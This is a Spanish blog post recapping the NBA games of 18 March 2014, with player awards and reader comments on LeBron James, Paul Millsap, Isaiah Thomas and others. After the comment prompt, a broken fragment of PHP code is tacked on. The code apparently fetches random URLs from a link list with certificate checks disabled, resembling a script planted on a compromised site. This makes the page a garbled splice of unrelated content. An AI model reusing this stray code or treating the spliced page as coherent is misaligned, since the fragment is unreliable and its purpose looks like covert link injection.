La Crónica: Iba a ser… legendario

19 de March de 2014 por txusma

Día de emociones en la NBA, con 3 de los 5 partidos que se disputaron anoche resueltos en la prórroga. Sin embargo, empezaremos por uno de los que acabaron en el tiempo regular, uno que al final del primer cuarto llevaba camino de ser histórico y que se quedó simplemente en “interesante”. A los 10 minutos del Heat – Cavaliers, Lebron James había anotado 25 puntos gracias a un 10 de 11 en tiros de campo y 5 triples y parecía estar en disposición de asaltar su marca personal de anotación. Pero en los 3 cuartos restantes, en lugar de seguir tirando, “King” James se frenó y solo intentó 8 lanzamientos más, acabando con 43 puntos que saben a poco. Tal vez sintió compasión de unos Cavs que partían sin Kyrie Irving ni Luol Deng de inicio pero no debió dejar que tan mundanos sentimientos le nublaran porque Cleveland plantó cara hasta el último momento (100-96).

También tuvieron que pelear mucho los Blazers que necesitaron de una prórroga para imponerse al peor equipo de la liga, los Milwaukee Bucks (115-120). Los de Oregon no pasan por su mejor momento y esperan la vuelta de Lamarcus Aldridge como agua de mayo. El partido discurrió muy igualado y con constantes alternancias en el marcador pero el auténtico espectáculo llegó en la prórroga donde los Blazers anotaron 22 puntos, récord de la franquicia. 

El Toronto – Atlanta también fue un patido igualado, jugado de poder a poder. Paul Millsap consiguió el primer triple-doble de su carrera y Jeff Teague su mejor marca anotadora pero aún así los Raptors pelearon hasta el último suspiro (113-118). Con esta ya van 5 victorias consecutivas de los Haws. Y en el último partido resultado por la prórroga, los Kings se alzaron con la victoria a pesar de perder por 5 puntos a falta de 17 segundos. Isaiah Thomas (que consiguió un triple-doble) anotó un triple a la desesperada, John Wall falló dos tiros libres y Rudy Gay anotó sobre Marcin Gortat a falta de 5 segundos. Película de miedo para los de la capital. En el tiempo extra, la propia inercia hizo caer la victoria del lado de los locales (111-117).

En el útimo partido de la noche, los Warriors no tuvieron ningún problema para deshacerse de los Magic a pesar de no contar con Iguodala ni Bogut, ambos con molestias que les pueden hacer perderse algún partido (89-103).

PREMIOS

MVP: Podría haber sido histórico pero se quedó en una grandísima actuación. Lebron James acabó el partido con 43 puntos en 19 lanzamientos, 6 rebotes, 4 asistencias, 2 robos y 3 tapones.

Rookie: Victor Oladipo anotó 10 puntos, cogió 5 rebotes y repartió 5 asistencias.

Sorpresa: Pasan las temporadas y prácticamente en todas Zaza Pachulia encadena una buena serie de partidos. Ahora mismo es de lo mejor de los Bucks (que no es muy difícil) con partidos como el de ayer: 17 puntos, 13 rebots y 3 robos.

Decepción: Arron Afflalo dio penita ante el poderoso juego exterior de los Warriors. Se quedó en 4 puntos y si él no anota es muy difícil que los Magic puedan ganar.

Esfuerzo en vano: Demar DeRozan plantó cara a los Hawks con 29 puntos, 10 rebotes y 6 asistencias pero la pareja Teague-Millsap estuvo demasiado bien.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Nacho dice:
    #1

    Hace quince días habíamos condenado a Atlanta al más oscuro de los ocasos y de repente está a un tiro de adelantar a Charlotte y tiene más cerca la quinta plaza de la conferencia que el resuello de los Knicks.
    Y pensar que a estas alturas yo colocaba en esta posición a los Cav’s!!!

      Citar

  2. txusma dice:
    #2

    Nacho:
    Hace quince días habíamos condenado a Atlanta al más oscuro de los ocasos y de repente está a un tiro de adelantar a Charlotte y tiene más cerca la quinta plaza de la conferencia que el resuello de los Knicks.
    Y pensar que a estas alturas yo colocaba en esta posición a los Cav’s!!!

    La clave es Paul Millsap. Vaya pedazo de jugador.

      Citar

  3. Nacho dice:
    #3

    Ya no es solo lo que aporta numéricamente Millsap, si no la tranquilidad que debe dar al equipo.

      Citar

  4. Nacho dice:
    #4

    El pasado domingo se cerró la quincena en la que analicé los P.O. del Oeste. Todos los equipos, salvo Minny, superaron el objetivo que les exigía, en función de su calendario, para estar en la pomada.
    Estos fueron los resultados, por si a alguien le interesa:
    Minny partía con 28/29. Le pedí 35/30 y se quedó en 33/32. Tenía un calendario facilón, y un equipo con hambre hubiera hecho un 8/0 antes que el 7/1, pero… juegan bonito muchas veces y se dejan la ambición. Derrotas ante NY, TOR y CHA las dos primeras en casa. Decepción en la quincena como decepción en la temporada.
    Memphis partía con 32/25, le pedí 38/28 y consiguieron 39/27. Es decir, solo dos derrotas en nueve partidos, con tres back to back. Los osos han vuelto. De hecho arrebataron a los Suns la plaza de PO. Cierto que los equipos a los que se enfrentó no eran de la clase alta. Pero andaban por ahí CHI, BKN, TOR y POR. Creo por otra parte que es el equipo que preocupa a los grandes como rival de primera ronda. Ni OKC ni SAS los querrán ver.
    Phoenix partía con 34/24, le pedí 38/28 y me hicieron caso. Al final quizás ha sido corto, pero enfrentarse en 8 partidos dos veces a LAC, una a OKC , GSW, y TOR tiene miga. Se le han puesto las cosas muy cuesta arriba y creo que solo una debacle total de POR (que han estado a punto de empezar hoy) les llevaría a unas series que si alguien se merece son ellos.
    Dallas partía con un 36/24, les pedí un 40/28 y se despacharon con un 40/27. Contabilicé un partido más, y se lo daba por perdido. Se han manejado bien Nowitzki y los suyos teniendo en cuenta que en estos 7 partidos se han enfrentado a los tres líderes de la liga más los GSW y POR. Funcionan como equipo, y la tremenda segunda juventud de Vince Carter es brutal. Con estos últimos partidos podría luchar por el mejor 6º hombre.
    Los Warriors partían con un 36/23, les pedí un 41/27 y se han despachado con un 42/26. Sólo tres derrotas en estos 9 partidos jugando contra IND y LAC y tres duelos ‘directos’ DAL, PHX y POR, les hacen estar más cerca de la 5ºplaza que otra cosa. Y ahora con la victoria de anoche, una quincena relajada en la que solo tienen cuatro partidos más y facilones. Parece que resurge la bahía y dejan las dudas en algún pecio cercano al puerto.

      Citar

  5. Ruxixon dice:
    #5

    Bonitas las minutadas que está jugando LeBron en el tramo final de temporada,soy bastante crítico en este aspecto,y veo algo de conservadurismo en Riley.No sé hasta qué punto habrán apostado por Granger,Bynum o mismamente Gooden u otros jugadores que ahora no me vienen a la cabeza,pero no hubiera estado mal haberse traido a alguien -Liggins ?¿- y diré lo mismo aunque ganen,que ójala,el tercer campeonato seguido.

      Citar

  6. Denise dice:
    #6

    Isiah Thomas no era un pick 60 de un Draft? Pfff…eso si que es un robo y a la chita callando sin hacer mucho ruido, vaya pedazo números se está marcando este año.

      Citar

  7. Jose Luis dice:
    #7

    Vaya canastón de Harkless, para mí es el TOP1 fijo

      Citar

  8. Denise dice:
    #8

    Jose Luis:
    Vaya canastón de Harkless, para mí es el TOP1 fijo

    A mi Harkless me encanta, 20 años, un fisico y atleticismo brutal, unos tremendos muelles y atrás aporta muchísimo robando balones en lineas de pase. En los Magic creo que lo tienen bastante marginado en el apartado ofensivo y menos mal que ahora está jugando mucho porque durante los primeros 30 partidos, el payaso de Vaughn apenas le daba cancha. Los defectos a pulir, su tiro exterior, y su excesiva frialdad a veces, pero el tio es un escandalo de jugador y la parte mala de que Orlando pille a Wiggins/Parker es que este chaval quedaría en el ostracismo y su progresión se cortaría.

      Citar

  9. Sancho88 dice:
    #9

    En cualquier temporada normalita Thomas habría sido de largo el MIP de la competición, pero este año con Davis y Drummond… imposible. Aún así tengo que rectificar graves acusaciones que he hecho sobre Thomas. Está aprendiendo a jugar más para el equipo, y, curiosamente, está viendo también que sus estadísticas de puntos no se resienten y, sin embargo, sí crecen sus asistencias. El partido de ayer es la demostración que jugando tranquilo para sus compañeros, no solo sigue siendo el líder el equipo ante las locuras de Cousins, sino que se ven partes de su juego que antes no veíamos. Ha aprendido mucho a calmarse, a templarse. Antes cada bloqueo arriba que lograba pasar era una penetración suya o un triple suyo. Ahora, sin embargo, busca mucho en los postes a JT, Evans y Cousins, o mira hacia fuera para jugar con Gay. Enorme trabajo de conversión a base puro. Yo ya le estaba cogiendo una manía terrible como a Tyreke, pero hay jugador, Kings no van a necesitar un base en el draft. Si escogen a Smart (que no creo que les llegue) podrían ponerlo de escolta.

    El problema de Isaiah Thomas llega por culpa de su físico. Pierde muchos balones no por no tener un buen manejo de balón, sino porque me da la sensación de que sus manos son pequeñas y le cuesta mucho retener el balón como pueden hacer sobadores profesionales tipo Irving o Parker. El otro día contra los Wolves Ricky le robó tres veces el balón de esta manera. Cuando Thomas controlaba el tempo del partido, imprescindible en el último cuarto del partido, Ricky lograba ponerle en complicaciones en todas las posesiones en las que no llegaban buenos bloqueos. Por eso Thomas necesita un base-escolta como Smart para deshaogarle en las tareas de dirección en los últimos minutos de partido y dejarle como falso escolta para tirar cómodamente.

    Ese es otro de los hándicaps de los Kings. El 95% (por no decir 100%) de las canastas de Thomas llegan exclusivamente porque él se las genera. No hay otro líder en el equipo, alguien que pueda distribuir el balón. Por tanto, para mí Isaiah Thomas tiene un mérito impresionante y ha conseguido que cambie mucho mi percepción sobre él. Antes era un cabronazo chupón que solo miraba sus puntos, y ahora es capaz de darle victorias a un equipo acomplejado en el ataque en los últimos minutos como los Kings. Ya iba siendo hora de una ayuda por parte de Gay, que hay que ver cuánto le cuesta asumir el papel de anotador en los momentos calientes. Se acojona con una facilidad que da gusto.

    Por otra parte, McLemore sigue siendo la cuarta opción en el ataque y ahí Malone no es nada flexible. En muchos partidos el equipo necesita que le den confianza a McLemore para sumar una amenaza más al big three Thomas-Gay-Cousins pero ningún sistema le busca realmente, y lo dejan aislado en las esquinas sin ni siquiera buscarle. Ahí pierden los Kings una opción muy buena de anotación.

    Y ya termino, están cerca las 28 victorias del curso pasado. No van a llegar a 33 como yo predije en el análisis previo y es una pena, otro año por debajo del 40%. Como no renueven a Thomas volverá la oscuridad a este equipo, que al menos ahora tiene tres jugadores realmente determinantes y solo se trata de ir añadiendo complementos. Si no son capaces de mantener ni siquiera el núcleo Thomas-Gay-Cousins, es preferible que Ranadivé se plante y le venda la franquicia a Seattle

      Citar

  10. Sancho88 dice:
    #10

    Y, termino definitivamente, Derrick Williams se merece claramente jugar como 4 titular. Está desaprovechadísimo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>